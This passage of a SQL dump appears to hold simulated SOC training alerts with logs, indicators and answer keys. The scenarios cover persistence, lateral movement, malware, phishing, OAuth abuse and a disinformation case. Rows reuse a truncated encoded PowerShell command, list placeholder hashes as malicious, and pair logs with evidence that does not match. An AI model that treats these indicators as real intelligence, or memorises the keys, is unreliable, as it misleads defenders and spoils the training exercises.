trojan.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"malicious\",\"details\":\"File associated with recent compromise attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User is a legitimate employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(280, 'Establish Persistence', 'high', 'Intrusion Detection System (IDS)', 'An advanced persistent threat actor has set up a backdoor to maintain access to compromised systems by creating a persistent service. This allows for continued unauthorized access even if initial malware is removed.', 'Persistence', 'T1543.003 - Create or Modify System Process: Windows Service', 1, 'Closed', 169, '{\"timestamp\":\"2023-09-14T02:45:12Z\",\"event_id\":\"12345678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin_user\",\"action\":\"establish_persistence\",\"persistence_type\":\"service_creation\",\"service_name\":\"UpdateService\",\"service_exe\":\"C:\\\\Windows\\\\System32\\\\updater.exe\",\"file_hash\":\"abc123def4567890abc123def4567890\",\"status\":\"success\"}', '2025-12-31 13:45:44', '2026-02-18 07:34:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with multiple APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attacker.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"abc123def4567890abc123def4567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware samples.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account used for unauthorized service creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.885Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-09-14T02:45:12Z\\\",\\\"event_id\\\":\\\"12345678\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action\\\":\\\"establish_persistence\\\",\\\"persistence_type\\\":\\\"service_creation\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_exe\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updater.exe\\\",\\\"file_hash\\\":\\\"abc123def4567890abc123def4567890\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(281, 'Lateral Movement and Data Exfiltration', 'high', 'Network Traffic Analysis', 'Detected lateral movement activities with potential data exfiltration attempts. Anomalous network traffic indicates movement from compromised host to sensitive data repositories.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"1002\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.55\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_accessed\":\"confidential_data.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"network_traffic\",\"action\":\"exfiltration_attempt\"}', '2025-12-31 13:45:44', '2026-02-18 07:36:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Targeted internal server storing sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during suspicious network activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"File hash matches known clean 
version.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(282, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malicious.exe\' was executed on the host \'DESKTOP-1234\'. The file hash is associated with known malware.', 'Malware', 'T1059', 1, 'Closed', 185, '{\"timestamp\":\"2023-10-15T14:32:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1234\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 14:09:48', '2026-02-20 09:07:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address belonging to the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is identified as a part of a known malware family.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process execution behavior is indicative of malware.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process \'malicious.exe\' is executed from an internal machine and is linked to a known malware hash. 
Immediate isolation and further investigation are necessary.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(283, 'Suspicious Network Connection from External IP Detected', 'high', 'Firewall', 'A network connection from an external IP was detected attempting to access an internal server. The connection was flagged due to a high number of failed login attempts.', 'Brute Force', 'T1110', 1, 'Closed', 93, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"internal-server-01\",\"failed_attempts\":35}', '2026-01-01 01:58:11', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to the organization\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has been involved in multiple brute force attacks, indicating malicious intent.\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS', NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(284, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A suspicious process execution was detected on a host, linked to known malware activity. The process attempted to connect to a known malicious Command and Control server.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T16:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.23\",\"dst_ip\":\"198.51.100.17\",\"hostname\":\"workstation-07\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 20:54:16', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.17\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to Command and Control servers\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected workstation\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution and connection to a known C2 server confirm malware infection.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(285, 'Spear-Phishing Email Campaign Detected', 'high', 'Email Gateway', 'APT28 initiates their campaign by sending carefully crafted spear-phishing emails to key personnel within political organizations, aiming to harvest credentials and gain a foothold in the network.', 'Phishing', 'T1566.002', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-15T08:47:23Z\",\"source_ip\":\"185.92.220.34\",\"destination_ip\":\"10.0.2.15\",\"email_subject\":\"Urgent: Review Attached Document\",\"sender_email\":\"john.doe@fakeorg.com\",\"recipient_email\":\"alice.smith@politicalorg.org\",\"attachment_filename\":\"Urgent_Document.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malicious_link\":\"http://malicious-link.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\"}', '2025-12-31 15:17:10', '2026-02-18 07:40:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Reported for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@fakeorg.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Known phishing sender.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing documents.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"Hosting phishing 
page.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email Campaign Detected\",\"date\":\"2026-02-01T20:32:18.890Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(286, 'Malicious Domain Infrastructure Identified', 'high', 'Firewall', 'APT28 has set up a credential harvesting operation using domains that mimic legitimate login portals. User traffic is being redirected to these domains following a successful phishing campaign. The captured credentials will allow the adversary to escalate their access within the network.', 'Credential Harvesting', 'T1566.002', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.14.22.5\",\"dst_ip\":\"203.0.113.45\",\"src_port\":\"443\",\"dst_port\":\"80\",\"action\":\"allow\",\"domain\":\"login-secure-portal.com\",\"url\":\"http://login-secure-portal.com/login\",\"user\":\"jdoe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file\":\"login_page.html\"}', '2025-12-31 15:17:10', '2026-02-18 07:41:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"login-secure-portal.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Domain registered recently and flagged for phishing.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-secure-portal.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL is hosting a phishing login page.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Database\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known phishing page 
template.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(287, 'OAuth Token Abuse Technique Detected', 'high', 'EDR', 'APT28 uses OAuth token abuse to maintain access to compromised accounts, which enables them to exfiltrate sensitive data without needing user passwords.', 'Persistence', 'T1550.001', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-12T08:45:32Z\",\"event_id\":\"evt12345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe@company.com\",\"oauth_token\":\"ya29.GlsBv...Xw3Fw\",\"action\":\"token_use\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"sensitive_data.docx\",\"user_agent\":\"Mozilla/5.0\",\"event_description\":\"OAuth token used for accessing cloud storage\"}', '2025-12-31 15:17:10', '2026-02-18 07:42:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known APT28 IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_db\",\"verdict\":\"internal\",\"details\":\"Employee email address\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file hash with potential data exfiltration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(288, 'Disinformation Campaign Planning Uncovered', 'high', 'Threat Intelligence Platform', 'Analysts have uncovered a coordinated disinformation campaign through leaked communications from APT28 operatives. The campaign aims to discredit political figures and manipulate election outcomes using fake news distribution and social media manipulation.', 'Information Operations', 'T1027 - Obfuscated Files or Information', 1, 'Closed', 169, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"185.92.220.50\",\"destination_ip\":\"192.168.1.105\",\"malicious_filename\":\"election_strategy_2023.pdf\",\"hash_sha256\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"username\":\"jdoe\",\"action\":\"file_download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"description\":\"Leaked document detailing plans for disinformation campaign.\"}', '2025-12-31 15:17:10', '2026-02-23 03:12:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT28 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"election_strategy_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Reports\",\"verdict\":\"suspicious\",\"details\":\"File used in the distribution of disinformation 
